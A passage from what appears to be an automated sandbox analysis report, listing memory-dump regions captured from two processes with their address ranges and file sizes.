                                                                                                                        • memory/2728-4912-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2728-4911-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2728-4910-0x00007FFFD7740000-0x00007FFFD8201000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          10.8MB

                                                                                                                        • memory/2728-4900-0x000001D766910000-0x000001D766932000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          136KB

                                                                                                                        • memory/2728-4899-0x00007FFFD7743000-0x00007FFFD7745000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          8KB

                                                                                                                        • memory/4052-44-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-26-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-58-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-56-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-54-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-68-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-65-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-60-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-12-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-10-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-8-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-18-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-16-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-14-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-5-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-4885-0x00000000745D0000-0x0000000074D80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4052-4886-0x00000000745D0000-0x0000000074D80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4052-4888-0x0000000006B30000-0x0000000006B7C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                        • memory/4052-4887-0x0000000006A50000-0x0000000006ACE000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          504KB

                                                                                                                        • memory/4052-4889-0x00000000745DE000-0x00000000745DF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4052-4890-0x00000000745D0000-0x0000000074D80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4052-62-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-25-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-67-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-32-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-41-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-42-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-0-0x00000000745DE000-0x00000000745DF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4KB

                                                                                                                        • memory/4052-28-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-30-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-38-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-46-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-48-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-50-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-52-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-37-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-34-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-20-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-5747-0x0000000006C80000-0x0000000006CD4000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          336KB

                                                                                                                        • memory/4052-5768-0x00000000745D0000-0x0000000074D80000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          7.7MB

                                                                                                                        • memory/4052-22-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-6-0x0000000006590000-0x00000000067CA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-4-0x0000000006870000-0x0000000006902000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          584KB

                                                                                                                        • memory/4052-3-0x0000000006D80000-0x0000000007324000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          5.6MB

                                                                                                                        • memory/4052-2-0x0000000006590000-0x00000000067D0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          2.2MB

                                                                                                                        • memory/4052-1-0x00000000004C0000-0x0000000000946000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.5MB